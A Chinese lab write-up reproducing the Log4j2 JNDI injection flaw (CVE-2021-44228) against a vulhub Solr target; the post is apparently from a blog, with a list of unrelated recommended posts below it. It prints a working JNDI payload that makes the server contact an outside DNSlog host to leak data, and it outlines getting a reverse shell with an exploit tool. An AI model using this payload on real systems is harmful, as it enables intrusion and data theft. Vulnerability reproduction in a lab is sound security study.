vulhub log4j2 CVE-2021-44228漏洞复现

1.开启环境

2.访问靶场

3.可以发现 /solr/admin/cores?action= 这⾥有个参数可以传,先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的版本号!

可以访问到我们Java的版本,所以说明此处存在命令执行漏洞

复制代码
/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.ir3n8l.dnslog.cn}

4.开始反弹shell

但是此处需要JNDI-Injection-Exploit

JNDI项目地址:

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

5.准备payload,并进行base64加密

6.将此payload复制到模版中,变为最终payload

在kali进行最终payload的运行,会获得一串有jndi生成的payload

7.监听6666端口

然后使用这条命令在log4j2中运行

8.最终会在监听处反弹回shell

相关推荐
ACGkaka_2 天前
Spring Boot实战(三十六)编写单元测试
spring boot·单元测试·log4j
forestsea14 天前
分布式日志治理:Log4j2自定义Appender写日志到RocketMQ
java·log4j·java-rocketmq
遥不可及~~斌16 天前
Spring Boot 项目日志系统全攻略:Logback、Log4j2、Log4j与SLF4J整合指南
spring boot·log4j·logback
weixin_4383354016 天前
SpringBoot依赖冲突引发的 log4j 日志打印问题及解决方法
spring boot·单元测试·log4j
我是坑货17 天前
maven的项目管理和构建生命周期
java·log4j·maven
凭君语未可1 个月前
详解Maven的主要生命周期
java·log4j·maven
WIN赢1 个月前
单元测试的编写
单元测试·log4j
zerohawk1 个月前
【log4j】配置Slf4j
junit·单元测试·log4j
熬了夜的程序员1 个月前
Go 语言封装邮件发送功能
开发语言·后端·golang·log4j
故事与他6451 个月前
Apache中间件漏洞攻略
java·服务器·安全·网络安全·中间件·log4j·apache